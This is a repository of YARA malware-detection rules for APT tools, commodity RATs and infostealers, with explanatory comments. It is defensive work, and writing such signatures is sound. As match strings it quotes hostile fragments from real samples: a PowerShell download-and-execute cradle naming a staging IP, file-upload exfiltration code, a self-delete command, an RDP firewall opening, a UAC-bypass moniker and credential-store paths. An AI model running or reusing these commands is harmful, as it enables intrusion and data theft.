/*
 * Repository listing as rendered on the page. Each file below is introduced by a
 * "// ===== <path> =====" banner; LICENSE.md and README.md are not shown here.
 *
 *   .gitignore
 *   APT/
 *     dtrack_lazarus_group.yar  micropsia_apt_c_23.yar  poshc2_apt_33.yar  powerton_apt_33.yar
 *   Behavioral/
 *     steganography.yar
 *   Broadbased/
 *     agent_tesla.yar  asyncrat.yar  ave_maria_warzone_rat.yar  azorult_plus_plus.yar
 *     bitrat_unpacked.yar  blackremote_blackrat.yar  darktrack_rat.yar  dcrat.yar
 *     engwultimate.yar  formbook.yar  frat.yar  infostealers.yar  kleptoparasite.yar
 *     lockergoga.yar  megacortex.yar  metamorfo.yar  nanocore.yar  netwire.yar
 *     parallax_rat.yar  quasarrat.yar  redline.yar  remcos.yar  ursnif_gozi_isfb.yar
 *     venomrat.yar  wsh_rat.yar  xenorat.yar  xworm.yar
 *   LICENSE.md  README.md
 */

// ===== /.gitignore =====
// (not a YARA file) its single entry is:
// .history/

// ===== /APT/dtrack_lazarus_group.yar =====

// Dtrack (Lazarus) 2020 build: PDB path, logging / user-agent strings, the "net use" /
// "move" commands it issues against \\<ip>\C$, and three code fragments.
rule dtrack_2020 {
    meta:
        author = "jeFF0Falltrades"

    strings:
        $pdb = "Users\\user\\Documents\\Visual Studio 2008\\Projects\\MyStub\\Release\\MyStub.pdb" wide ascii
        $str_log = "------------------------------ Log File Create...." wide ascii
        $str_ua = "CCS_Mozilla/5.0 (Windows NT 6.1" wide ascii
        $str_chrome = "Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\History" wide ascii
        $str_tmp = "%s\\~%d.tmp" wide ascii
        $str_exc = "Execute_%s.log" wide ascii
        // Both regexes carry no "wide" modifier, so they only match ASCII text. The IPv4
        // octets are not range-checked ([0-9]{1,3}), which is fine for a command template.
        //   net use \\<ipv4>\C$ /delete
        $str_reg_use = /net use \\\\[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\\C\$ \/delete/
        //   move /y %s \\<ipv4>\C$\Windows\Temp\MpLogs\
        $str_reg_move = /move \/y %s \\\\[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\\C\$\\Windows\\Temp\\MpLogs\\/
        // shift / xor reg,[reg-4] / and-or-with 0xFF / shift by 23, then shift by 8 / mov reg,[reg-4] /
        // shift by 16 -- register fields wildcarded. Presumably a hash or decode routine; not
        // verifiable from the rule alone.
        $hex_1 = { d1 ?? 33 ?? fc 81 ?? ff 00 00 00 c1 ?? 17 }
        $hex_2 = { c1 ?? 08 8b ?? fc c1 ?? 10 }
        // or dword ptr [disp32], 0x2939311C (81 /1 with a disp32 operand): the address is
        // wildcarded, the constant is what the rule keys on.
        $hex_3 = { 81 0D [4] 1C 31 39 29 }

    condition:
        // $hex_3 (a single 8-byte constant) is allowed to fire alone; anything else needs a
        // second indicator.
        2 of them or $hex_3
}

// ===== /APT/micropsia_apt_c_23.yar =====

// Micropsia (APT-C-23) 2018 sample: two build-specific code fragments plus the App-ID file name.
rule micropsia_2018 {
    meta:
        author = "jeFF0Falltrades"
        hash = "4c3fecea99a469a6daf2899cefe93d9acfd28a0b6c196592da47e917c53c2c76"

    strings:
        // push ebx; xor ebx,ebx; imul edx,[ebx+0x68D008],0x08088405; inc edx; mov [ebx+0x68D008],edx;
        // mul edx; mov eax,edx; pop ebx; ret. The 0x08088405 multiplier followed by an increment
        // looks like the Borland/Delphi RTL Random() LCG with RandSeed at 0x68D008 -- if so this
        // is RTL code tied to one build (absolute address) rather than malware-specific logic;
        // confirm before relying on it outside this sample.
        $gen_app_id = { 53 31 DB 69 93 08 D0 68 00 05 84 08 08 42 89 93 08 D0 68 00 F7 E2 89 D0 5B C3 } // 0x4072f0 loop which generates the unique "App ID"
        // push 0x400; lea eax,[esp+4]; push eax; mov eax,edi; call rel32; mov ebp,eax; push ebp;
        // call rel32 (only the low two bytes of the second rel32 are wildcarded, so this is also
        // build-specific).
        $get_temp_dir = { 68 00 04 00 00 8d 44 24 04 50 8b c7 e8 [4] 8b e8 55 e8 [2] fe ff } // 0x0042C689 func retrieving %TEMP%
        // "ApppID" (triple p) is kept as-is: presumably the sample's own spelling -- do not "fix".
        $str_install_appid = "ApppID.txt" wide ascii nocase

    condition:
        2 of them
}

// ===== /APT/poshc2_apt_33.yar =====

// PoshC2 payloads as seen in 2019 APT33 job-scam lures: a PowerShell stager branch ($js_*)
// and an HTA/VBScript dropper branch ($hta_*).
rule poshc2_apt_33_2019 {
    meta:
        author = "jeFF0Falltrades"
        desc = "Alerts on PoshC2 payloads which align with 2019 APT33 reporting (this will not fire on all PoshC2 payloads)"
        ref = "http://www.rewterz.com/rewterz-news/rewterz-threat-alert-iranian-apt-uses-job-scams-to-lure-targets"

    strings:
        // [datetime]::ParseExact("<d>/<m>/<y>","dd/MM/yyyy",$null  -- ASCII only (no "wide").
        $js_date = /\[datetime\]::ParseExact\("[0-9]+\/[0-9]+\/[0-9]+","dd\/MM\/yyyy",\$null/
        // The next four are common in benign PowerShell; the 4-of-6 threshold is what carries them.
        $js_crypt = "System.Security.Cryptography" wide ascii
        $js_host = "Headers.Add(\"Host" wide ascii
        $js_proxy = "$proxyurl = " wide ascii
        $js_arch = "$env:PROCESSOR_ARCHITECTURE" wide ascii
        $js_admin = "[System.Security.Principal.WindowsBuiltInRole]::Administrator" wide ascii
        // URL-escaped: document.write('<script type="text/vbscript">\nSub AutoOpen()
        $hta_unescape = "%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%74%65%78%74%2f%76%62%73%63%72%69%70%74%22%3e%5c%6e%53%75%62%20%41%75%74%6f%4f%70%65%6e%28%29" wide ascii
        // Hex-encoded:  /w 1 IEX (New-Object Net.WebClient).DownloadString('http://5.252.178.20/raytheon2-jobs.jpg');
        // This embeds one campaign's staging URL, so it will not generalise beyond that infrastructure.
        $hta_hex = "202f7720312049455820284e65772d4f626a656374204e65742e576562436c69656e74292e446f776e6c6f6164537472696e672827687474703a2f2f352e3235322e3137382e32302f7261797468656f6e322d6a6f62732e6a706727293b" wide ascii
        // Hex-encoded: powershell.exe (generic on its own; always paired via the 2-of threshold)
        $hta_powershell = "706f7765727368656c6c2e657865" wide ascii

    condition:
        4 of ($js_*) or 2 of ($hta_*)
}

// ===== /APT/powerton_apt_33.yar =====

// POWERTON (APT33) PowerShell backdoor strings.
rule apt_33_powerton {
    meta:
        author = "jeFF0Falltrades"
        hash = "6bea9a7c9ded41afbebb72a11a1868345026d8e46d08b89577f30b50f4929e85"

    strings:
        $str_wmi = "Adding wmi persist ..." wide ascii
        // "Registery" is the sample's own misspelling -- keep verbatim.
        $str_registery = "Poster \"Registery Value With Name" wide ascii
        $str_upload = "(New-Object Net.WebClient).UploadFile(\"$SRVURL$address\", \"$fullFilePath" wide ascii
        $str_pass = "jILHk{Yu1}2i0h^xe|t,d+Cy:KBv!l?7" wide ascii
        $str_addr = "$address=\"/contact/$BID$($global:rndPost)/confirm" wide ascii
        $str_png = "$env:temp + \"\\\" + $(date -format dd-m-y-HH-mm-s) + \".png" wide ascii
        $str_msg = "/contact/msg/$BID$($global:rndPost)" wide ascii
        $str_ua = "Mozilla/5.0 (Windows NT $osVer; rv:38.0) Gecko/20100101 Thunderbird/38.1.0 Lightning/4.0.2" wide ascii
        $domain = "backupaccount.net" wide ascii

    condition:
        // $domain alone is sufficient: expect hits on threat reports / IOC lists that quote the
        // domain, not only on payloads.
        2 of ($str*) or $domain
}

// ===== /Behavioral/steganography.yar =====

// Image/ZIP polyglot: a file that starts with a GIF/JPEG/PNG magic but also carries a ZIP
// local-file header and an end-of-central-directory record at the very end.
rule zip_img_stego {
    meta:
        author = "jeFF0Falltrades"
        description = "This rule attempts to identify ZIP (and JAR, APK, DOCX, etc.) archives embedded within various image filetypes."

    strings:
        $img_gif = { 47 49 46 38 }       // "GIF8"
        // FF D8 FF + first marker: DB (DQT), E0 (APP0/JFIF), EE (APP14/Adobe), E1 (APP1/EXIF)
        $img_jpeg_1 = { FF D8 FF DB } // explicitly break out JPEG variations to avoid triggering a "slowing down scanning" condition
        $img_jpeg_2 = { FF D8 FF E0 }
        $img_jpeg_3 = { FF D8 FF EE }
        $img_jpeg_4 = { FF D8 FF E1 }
        $img_png = { 89 50 4E 47 0D 0A 1A 0A }
        $zip_header = { 50 4B 03 04 }    // "PK\x03\x04" local file header signature
        // "PK\x05\x06" end-of-central-directory signature + low byte of "number of this disk" = 0,
        // i.e. single-disk archives only.
        $zip_footer = { 50 4B 05 06 00 }

    condition:
        /* The final portion of this condition looks for the ZIP archive footer within 25 bytes
           of the end of the file - This can be omitted or adjusted for your use case, but appears
           to work for several waves of infostealers seen at the time of writing.
           Note: the EOCD record is 22 bytes plus the archive comment, so "starts within the last
           25 bytes" also implies a comment of <= 3 bytes and no trailing data after the archive;
           padded or commented archives will not match. */
        (for any of ($img*): ($ at 0)) and (all of ($zip*)) and ($zip_footer in (filesize-25..filesize))
}

// ISO attachments carrying a single-entry ZIP whose member is an .exe.
rule zip_iso_stego {
    meta:
        author = "jeFF0Falltrades"
        description = "This rule identifies a specific phishing technique of sending ISO file attachments containing ZIP (and JAR, APK, DOCX, etc.) archives which in turn contain malicious executables."

    strings:
        // ISO 9660 volume-descriptor identifier; checked at byte 1 of sectors 16/17/18
        // (0x8000/0x8800/0x9000 + 1, after the descriptor-type byte).
        $iso_header = { 43 44 30 30 31 } // CD001
        // ".exe" immediately followed by the EOCD: "PK\x05\x06", disk 0, CD on disk 0, 1 entry on
        // this disk, total entries starting with 01. Per the ZIP layout this means the last
        // central-directory filename ends in ".exe" with empty extra/comment fields and the archive
        // holds exactly one entry.
        $exe_zip = { 2e 65 78 65 50 4b 05 06 00 00 00 00 01 00 01 } // .exePK signature

    condition:
        (($iso_header at 0x8001) or ($iso_header at 0x8801) or ($iso_header at 0x9001)) and $exe_zip
}

// LokiBot variant that hides its encrypted payload inside an image (see reference).
rule lokibot_img_stego {
    meta:
        author = "jeFF0Falltrades"
        description = "This rule identifies a specific variant of LokiBot which uses image steganography to obscure an encrypted payload; See reference."
        reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/lokibot-gains-new-persistence-mechanism-uses-steganography-to-hide-its-tracks/"

    strings:
        $img_gif = { 47 49 46 38 }
        $img_jpeg_1 = { FF D8 FF DB } // explicitly break out JPEG variations to avoid triggering a "slowing down scanning" condition
        $img_jpeg_2 = { FF D8 FF E0 }
        $img_jpeg_3 = { FF D8 FF EE }
        $img_jpeg_4 = { FF D8 FF E1 }
        $img_png = { 89 50 4E 47 0D 0A 1A 0A }
        // ASCII: #$%^&*()__#@$#57$#!@  -- marker preceding the encrypted blob
        $loki_enc_header = { 23 24 25 5e 26 2a 28 29 5f 5f 23 40 24 23 35 37 24 23 21 40 }

    condition:
        (for any of ($img*): ($ at 0)) and $loki_enc_header
}

// ===== /Broadbased/agent_tesla.yar =====

// Agent Tesla (2019): the full list of Mozilla-derived mail/browser client names it targets,
// plus a repeated CIL multiply/xor decode idiom.
rule agent_tesla_2019 {
    meta:
        author = "jeFF0Falltrades"
        hash = "717f605727d21a930737e9f649d8cf5d12dbd1991531eaf68bb58990d3f57c05"

    strings:
        // Individually generic product names; the rule requires all ten.
        $appstr_1 = "Postbox" wide ascii nocase
        $appstr_2 = "Thunderbird" wide ascii nocase
        $appstr_3 = "SeaMonkey" wide ascii nocase
        $appstr_4 = "Flock" wide ascii nocase
        $appstr_5 = "BlackHawk" wide ascii nocase
        $appstr_6 = "CyberFox" wide ascii nocase
        $appstr_7 = "KMeleon" wide ascii nocase
        $appstr_8 = "IceCat" wide ascii nocase
        $appstr_9 = "PaleMoon" wide ascii nocase
        $appstr_10 = "IceDragon" wide ascii nocase
        // XOR sequence used in several decoding sequences in final payload
        // CIL: ldloc 0x000E; ldc.i4 <imm>; mul; ldc.i4 <imm>; xor
        $xor_seq = { FE 0C 0E 00 20 [4] 5A 20 [4] 61 }

    condition:
        // "all of them" already includes $xor_seq; the count term additionally demands > 10 hits.
        all of them and #xor_seq > 10
}

// ===== /Broadbased/asyncrat.yar =====

// AsyncRAT client. Shares its AES/config code with DcRAT, so DcRAT-only strings are excluded
// explicitly; the companion dcrat rule does the reverse.
rule asyncrat {
    meta:
        author = "jeFF0Falltrades"

    strings:
        $str_async = "AsyncClient" wide ascii nocase
        $str_aes_exc = "masterKey can not be null or empty" wide ascii
        $str_schtasks = "schtasks /create /f /sc onlogon /rl highest" wide ascii
        // DcRAT discriminators (any hit disqualifies this rule)
        $dcrat_1 = "dcrat" wide ascii nocase
        $dcrat_2 = "qwqdan" wide ascii
        $dcrat_3 = "YW1zaS5kbGw=" wide ascii          // base64("amsi.dll")
        $dcrat_4 = "VmlydHVhbFByb3RlY3Q=" wide ascii  // base64("VirtualProtect")
        $dcrat_5 = "save_Plugin" wide ascii
        // CIL: ldsfld <Field>; newobj <MethodDef>; stsfld  (static-field initialisation)
        $byte_aes_key_base = { 7E [3] 04 73 [3] 06 80 }
        // Hard-coded salt prefix (named by the author as the AES salt base)
        $byte_aes_salt_base = { BF EB 1E 56 FB CD 97 3B B2 19 }
        // CIL: ldsfld <Field>; callvirt <MemberRef>; callvirt <MemberRef>; castclass <TypeRef>
        $patt_verify_hash = { 7e [3] 04 6f [3] 0a 6f [3] 0a 74 [3] 01 }
        // CIL: ldstr <UserString>; stsfld <Field>  -- one per config setting, hence the count below
        $patt_config = { 72 [3] 70 80 [3] 04 }

    condition:
        // Because every $dcrat* must be absent, "6 of them" effectively means 6 of the 7
        // AsyncRAT indicators.
        (not any of ($dcrat*)) and 6 of them and #patt_config >= 10
}

// ===== /Broadbased/ave_maria_warzone_rat.yar =====

// Ave Maria / Warzone RAT strings (see ref).
rule ave_maria_warzone_rat {
    meta:
        author = "jeFF0Falltrades"
        ref = "https://blog.team-cymru.com/2019/07/25/unmasking-ave_maria/"

    strings:
        // Hard-coded distribution host: volatile, expect it to rot.
        $str_0 = "5.206.225.104/dll/" wide ascii
        $str_1 = "AVE_MARIA" wide ascii
        $str_2 = "MortyCrypter\\MsgBox.exe" wide ascii
        // Self-delete idiom (ping as sleep, then del)
        $str_3 = "cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q" wide ascii
        $str_4 = "ellocnak.xml" wide ascii
        $str_5 = "Hey I'm Admin" wide ascii
        $str_6 = "AWM_FIND" wide ascii
        // COM elevation moniker (UAC bypass via an auto-elevating COM class) -- the CLSID is as
        // observed in the sample.
        $str_7 = "Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}" wide ascii
        // Generic on its own; needs two further hits.
        $str_8 = "warzone" wide ascii

    condition:
        3 of them
}

// ===== /Broadbased/azorult_plus_plus.yar =====
import "pe"

// AZORult++ (C++ rewrite): RDP-enabling / user-hiding persistence strings, loot file names,
// a locale check, the PDB name and an import hash.
rule azorult_plus_plus {
    meta:
        author = "jeFF0Falltrades"
        hash = "9d6611c2779316f1ef4b4a6edcfdfb5e770fe32b31ec2200df268c3bd236ed75"

    strings:
        $rdp = "netsh firewall add portopening TCP 3389 \"Remote Desktop\"" wide ascii nocase
        $list_1 = "PasswordsList.txt" wide ascii nocase
        $list_2 = "CookieList.txt" wide ascii nocase
        $coin_1 = "Ethereum\\keystore" wide ascii nocase
        // Weak: a bare TLD fragment; it only contributes to the 5-of count.
        $c2_1 = ".ac.ug" wide ascii nocase
        // SpecialAccounts\Userlist hides an account from the logon screen
        $hide_user = "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist" wide ascii nocase
        $pdb = "azorult_new.pdb" wide ascii nocase
        // The call goes through an absolute IAT slot (0x00410044), so this pattern is tied to one
        // build. 0x0419 is the ru-RU LANGID -- a CIS-avoidance check, presumably.
        $lang_check = { FF 15 44 00 41 00 0F B7 C0 B9 19 04 00 00 66 3B C1 } // call ds:GetUserDefaultLangID; movzx eax, ax; mov ecx, 419h; cmp ax, cx

    condition:
        $pdb or 5 of them or pe.imphash() == "e60de0acc6c7bbe3988e8dc00556d7b9"
}

// ===== /Broadbased/bitrat_unpacked.yar =====

// Unpacked BitRAT (see reference). Both text strings are generic C++ runtime exception
// messages, so with the 6-of-7 threshold at least four of the five code patterns must match.
rule bitrat_unpacked
{
    meta:
        author = "jeFF0Falltrades"
        hash = "122cd4f33d1e1b42ce0d959bc35e5d633b029f4869c5510624342b5cc5875c98"
        description = "Experimental rule to detect unpacked BitRat payloads on disk or in memory, looking for a combination of strings and decryption/decoding patterns"
        reference = "https://krabsonsecurity.com/2020/08/22/bitrat-the-latest-in-copy-pasted-malware-by-incompetent-developers/"

    strings:
        $str_0 = "string too long" wide ascii
        $str_1 = "invalid string position" wide ascii
        // imul r32,r/m32,0x25; cdq; div/idiv; lea; cdq; div/idiv -- multiply-by-37 / divide arithmetic
        $hex_0 = { 6b ?? 25 99 f7 ?? 8d [2] 99 f7 }
        // bt dword ptr [disp32],1; jb rel32; bt dword ptr [disp32],0 -- tests bits 1 and 0 of a global flag
        $hex_1 = { 0f ba 25 [3] 00 01 0f 82 [4] 0f ba 25 [3] 00 00 }
        // four movdqa loads followed by four movdqa stores -- a 64-byte block copy
        $hex_2 = { 66 0f 6f ?? 66 0f 6f [2] 66 0f 6f [2] 66 0f 6f [2] 66 0f 7f ?? 66 0f 7f [2] 66 0f 7f [2] 66 0f 7f }
        // mov r32,[..]; shift by cl; xor eax,[disp32]
        $hex_3 = { 8b [2] d3 ?? 33 05 }
        // group-1 op r/m32,0; then three "mov dword ptr [disp32], imm32" stores
        $hex_4 = { 83 [2] 00 c7 05 [8] c7 05 [8] c7 05 [8] 83 }

    condition:
        6 of them
}

// ===== /Broadbased/blackremote_blackrat.yar =====

// BlackRemote / BlackRAT payload (see ref): C2 framing regexes and a repeated CIL call pattern.
rule blackremote_blackrat_payload_2020
{
    meta:
        author = "jeFF0Falltrades"
        ref = "https://unit42.paloaltonetworks.com/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/"

    strings:
        // Version strings are generic; they only count toward "2 of them".
        $str_vers_1 = "16.0.0.0" wide ascii
        $str_vers_2 = "16.2.0.0" wide ascii
        // %*%|<A-Z0-9>|%*%|<A-Z0-9>|%*%|<A-Z0-9>|%*%|<A-Z0-9>  (lazy quantifiers)
        $re_c2_1 = /%\*%\|[A-Z0-9]+?\|%\*%\|[A-Z0-9]+?\|%\*%\|[A-Z0-9]+?\|%\*%\|[A-Z0-9]+?/ wide ascii
        // literal |!*!||!*!|
        $re_c2_2 = /\|!\*!\|\|!\*!\|/ wide ascii
        // CIL: (ldloc.0; ldloca.s 9; call <MemberRef>; callvirt <MemberRef>) x3
        $hex_rsrc = { 06 12 09 28 ?? 00 00 0A 6F ?? 00 00 0A 06 12 09 28 ?? 00 00 0A 6F ?? 00 00 0A 06 12 09 28 ?? 00 00 0A 6F ?? 00 00 0A }

    condition:
        2 of them and (1 of ($re*) or $hex_rsrc)
}

// BlackRAT server-side / ProClient component.
rule blackremote_blackrat_proclient_2020
{
    meta:
        author = "jeFF0Falltrades"
        ref = "https://unit42.paloaltonetworks.com/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/"

    strings:
        // $str_0 contains $str_1, so a PDB-path hit counts as two of the four required.
        $str_0 = "K:\\5.0\\Black Server 5.0\\BlackServer\\bin\\Release\\BlackRATServerM.pdb" wide ascii nocase
        $str_1 = "BlackRATServerM.pdb" wide ascii nocase
        $str_2 = "RATTypeBinder" wide ascii nocase
        $str_3 = "ProClient.dll" wide ascii nocase
        $str_4 = "Clientx.dll" wide ascii nocase
        $str_5 = "FileMelting" wide ascii nocase
        $str_6 = "Foxmail.url.mailto\\Shell\\open\\command" wide ascii nocase
        $str_7 = "SetRemoteDesktopQuality" wide ascii nocase
        $str_8 = "RecoverChrome" wide ascii nocase
        $str_9 = "RecoverFileZilla" wide ascii nocase
        $str_10 = "RemoteAudioGetInfo" wide ascii nocase

    condition:
        4 of them
}
// ===== /Broadbased/darktrack_rat.yar =====
import "pe"

// DarkTrack RAT ("Alien" edition): Delphi source-path/PDB strings, browser-credential
// strings and two import hashes.
rule darktrack_rat {
    meta:
        author = "jeFF0Falltrades"
        hash = "1472dd3f96a7127a110918072ace40f7ea7c2d64b95971e447ba3dc0b58f2e6a"
        ref = "https://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml"

    strings:
        // $dt_pdb contains $dt_pas, so a single source-path hit already counts as two of the three.
        $dt_pdb = "C:\\Users\\gurkanarkas\\Desktop\\Dtback\\AlienEdition\\Server\\SuperObject.pas" wide ascii
        // NOTE(review): "SuperObject.pas" appears to be a third-party Delphi JSON unit name and
        // may occur in benign Delphi software -- confirm before weighting it.
        $dt_pas = "SuperObject.pas" wide ascii
        // Firefox logins.json field names (generic to credential stealers)
        $dt_user = "].encryptedUsername" wide ascii
        $dt_pass = "].encryptedPassword" wide ascii
        $dt_yandex = "\\Yandex\\YandexBrowser\\User Data\\Default\\Login Data" wide ascii
        $dt_alien_0 = "4.0 Alien" wide ascii
        $dt_alien_1 = "4.1 Alien" wide ascii
        $dt_victim = "Local Victim" wide ascii

    condition:
        (3 of ($dt*)) or pe.imphash() == "ee46edf42cfbc2785a30bfb17f6da9c2" or pe.imphash() == "2dbff3ce210d5c2b4ba36c7170d04dc2"
}

// ===== /Broadbased/dcrat.yar =====

// DcRAT client. Mirror of the asyncrat rule: same AES/config code patterns, but VenomRAT
// strings disqualify it (VenomRAT is the fork that carries HVNC).
rule dcrat {
    meta:
        author = "jeFF0Falltrades"

    strings:
        // VenomRAT discriminators (any hit disqualifies this rule)
        $venom_1 = "VenomRAT" wide ascii nocase
        $venom_2 = "HVNC_REPLY_MESSAGE" wide ascii
        $str_aes_exc = "masterKey can not be null or empty" wide ascii
        $str_b64_amsi = "YW1zaS5kbGw=" wide ascii                    // base64("amsi.dll")
        $str_b64_virtual_protect = "VmlydHVhbFByb3RlY3Q=" wide ascii  // base64("VirtualProtect")
        $str_dcrat = "dcrat" wide ascii nocase
        $str_plugin = "save_Plugin" wide ascii
        $str_qwqdan = "qwqdan" wide ascii
        // CIL: ldsfld <Field>; newobj <MethodDef>; stsfld
        $byte_aes_key_base = { 7E [3] 04 73 [3] 06 80 }
        // CIL: ldstr <UserString>; stsfld <Field> -- one per config setting, hence the count below
        $patt_config = { 72 [3] 70 80 [3] 04 }
        // CIL: ldsfld <Field>; callvirt <MemberRef>; callvirt <MemberRef>; castclass <TypeRef>
        $patt_verify_hash = { 7e [3] 04 6f [3] 0a 6f [3] 0a 74 [3] 01 }

    condition:
        // With every $venom* required absent, "5 of them" means 5 of the 9 DcRAT indicators.
        (not any of ($venom*)) and 5 of them and #patt_config >= 10
}
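// ===== /Broadbased/engwultimate.yar =====

// "Eng Wiz Ultimate" keylogger/stealer: base64-encoded config strings, plain strings, a
// UTF-16LE runic-obfuscated registry path and a build-specific CIL fragment.
rule EngWUltimate {
    meta:
        author = "jeFF0Falltrades"
        hash = "953b1b99bb5557fe86b3525f28f60d78ab16d56e9c3b4bbe75aba880f18cb6ad"

    strings:
        $b64_1 = "ZG8gbm90IHNjcmlwdA==" wide ascii // do not script
        $b64_2 = "Q2xpcEJvYXJkIExvZw==" wide ascii // ClipBoard Log
        $b64_3 = "RW5nIFdpe" wide ascii // Eng Wiz (prefix only, so the trailing base64 padding does not matter)
        $b64_4 = "SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25c" wide ascii // HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
        $b64_5 = "Q3JNb2RNbmdy" wide ascii // CrModMngr
        $b64_6 = "JVBER" wide ascii // Embedded data: base64 of "%PDF" (an embedded base64 PDF)
        $b64_7 = "qQAAMAAAAEAAAA" wide ascii // Embedded data: tail of "TVqQAAMAAAAEAAAA", the base64 of a standard MZ header (an embedded base64 PE)
        $str_1 = "Eng Wiz" wide ascii nocase
        $str_2 = "Engr Whizzy" wide ascii nocase
        $str_3 = "ClipBoard Log" wide ascii
        $str_4 = "Keylogger Log" wide ascii
        // Despite the name this is a drop path, not a PDB.
        $str_pdb = "C:\\Users\\USER\\AppData\\Roaming\\System\\jobs" wide ascii nocase
        // UTF-16LE bytes of the 12 runes below (U+16B0 U+16A3 U+16D3 U+16A6 U+16B8 U+16B8 U+169C U+16A8 U+16BB U+16BC U+16B1 U+16BB).
        // ᚰᚣᛓᚦᚸᚸ᚜ᚨᚻᚼᚱᚻ --> decodes to SEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu --> decodes to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
        $hex_reg = { b0 16 a3 16 d3 16 a6 16 b8 16 b8 16 9c 16 a8 16 bb 16 bc 16 b1 16 bb 16 }
        // MD5 hashing func
        // CIL: newobj; stloc.0; call; ldarg.0; callvirt; stloc.1; ldc.i4.s ??; call -- the metadata
        // tokens (0x0A000146, 0x0A000130, 0x0A000098, 0x0A00007D) are fixed, so this is build-specific.
        $hex_md5_func = { 73 46 01 00 0A 0A 28 30 01 00 0A 02 6F 98 00 00 0A 0B 1F ?? 28 7D 00 00 0A }

    condition:
        uint16(0) == 0x5A4D and ((3 of ($b64*)) or (3 of ($str*)) or (any of ($hex*)))
}

// ===== /Broadbased/formbook.yar =====

// Fires on Formbook VB6 initial and extracted files
rule formbook_vb {
    meta:
        author = "jeFF0Falltrades"
        ref = "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/"

    strings:
        // Six "push imm32" of 4-byte chunks "ess\0","Proc","tion","orma","tInf","NtSe" -- i.e.
        // "NtSetInformationProcess" built on the stack in reverse -- then "jmp short +0x2C".
        $hex_set_info = { 68 65 73 73 00 68 50 72 6F 63 68 74 69 6F 6E 68 6F 72 6D 61 68 74 49 6E 66 68 4E 74 53 65 54 EB 2C }
        // xor dword ptr [esp],imm32; sub ecx,3; loopne -15; push dword ptr [esi+ecx]; xor dword ptr [esp],...
        // (stack-based XOR decode loop)
        $hex_decode_loop = { 81 34 24 [4] 83 E9 03 E0 F1 FF 34 0E 81 34 24 }
        // Chain of "cmp byte ptr [eax+0x2A..0x33],0" each followed by je/jne: a byte-by-byte check
        // of some structure; what is being compared is not visible from the rule.
        $hex_anti_check = { 80 78 2A 00 74 3D 80 78 2B 00 74 37 80 78 2C 00 75 31 80 78 2D 00 75 2B 80 78 2E 00 74 25 80 78 2F 00 75 1F 80 78 30 00 74 19 80 78 31 00 75 13 80 78 32 00 74 0D 80 78 33 00 }
        // call rel32; cmp eax,0x300; setg dl; push esi; mov [esi+0x35],dl; then five more "push esi; call"
        // with fixed rel32 offsets -- build-specific.
        $hex_precheck = { E8 AE FA FF FF 3D 00 03 00 00 0F 9F C2 56 88 56 35 E8 3D FC FF FF 56 E8 E7 F6 FF FF 56 E8 41 F9 FF FF 56 E8 AB F7 FF FF 56 E8 F5 DE FF FF }
        $str_marker = "r5.oZe/gg" wide ascii

    condition:
        2 of them
}

// ===== /Broadbased/frat.yar =====

// FRat PowerShell loader (see ref): variable names / endpoint fragments of the script.
rule frat_loader {
    meta:
        author = "jeFF0Falltrades"
        ref = "https://twitter.com/jeFF0Falltrades/status/1270709679375646720"

    strings:
        $str_report_0 = "$ReportDone = Get-BDE" wide ascii
        $str_report_1 = "$Report = Get-BDE" wide ascii
        $str_img_0 = "$ImgURL = Get-BDE" wide ascii
        $str_img_1 = "Write-Host 'No Image'" wide ascii
        $str_img_2 = "$goinf + \"getimageerror\"" wide ascii
        $str_link = "$eLink = Get-BDE" wide ascii
        $str_tmp_0 = "$Shortcut.WorkingDirectory = $TemplatesFolder" wide ascii
        // NOTE(review): this copy had a line break inside the literal after "TemplatesFolder";
        // restored as a single space -- confirm against the upstream file.
        $str_tmp_1 = "TemplatesFolder = [Environment]::GetFolderPath" wide ascii
        $str_tmp_2 = "$vbout = $($TemplatesFolder)" wide ascii
        // "Shurtcut" is the script's own spelling -- keep verbatim.
        $str_shurtcut = "Get-Shurtcut" wide ascii
        $str_info_0 = "info=LoadFirstError" wide ascii
        $str_info_1 = "info=LoadSecondError" wide ascii
        $str_info_2 = "getimagedone?msg" wide ascii
        $str_info_3 = "donemanuel?id" wide ascii
        $str_info_4 = "getDone?msg" wide ascii
        $str_info_5 = "getManualDone?msg" wide ascii

    condition:
        3 of them
}

// FRat Node.js executable (packaged stub). The "\\\\" in the path strings is two literal
// backslashes, matching the JS-escaped form of the paths inside the bundle.
rule frat_executable {
    meta:
        author = "jeFF0Falltrades"
        ref = "https://twitter.com/jeFF0Falltrades/status/1270709679375646720"

    strings:
        $str_path_0 = "FRat\\\\Short-Port" wide ascii
        $str_path_1 = "FRatv8\\\\Door\\\\Stub" wide ascii
        $str_path_2 = "snapshot\\\\Stub\\\\V1.js" wide ascii
        // The next three are framework/runtime artefacts (sails.io client, the OpenSSL
        // "CRYPTOGAMS by" assembler banner, socket.io-client) and occur in benign Node bundles.
        $str_sails = "sails.io" wide ascii
        $str_crypto = "CRYPTOGAMS by " wide ascii
        $str_socketio = "socket.io-client" wide ascii

    condition:
        // Fix: the plain "3 of them" was satisfiable by the three generic runtime strings alone,
        // i.e. by any packaged Node app using sails/socket.io. Require at least one FRat path.
        3 of them and 1 of ($str_path*)
}

// ===== /Broadbased/infostealers.yar =====

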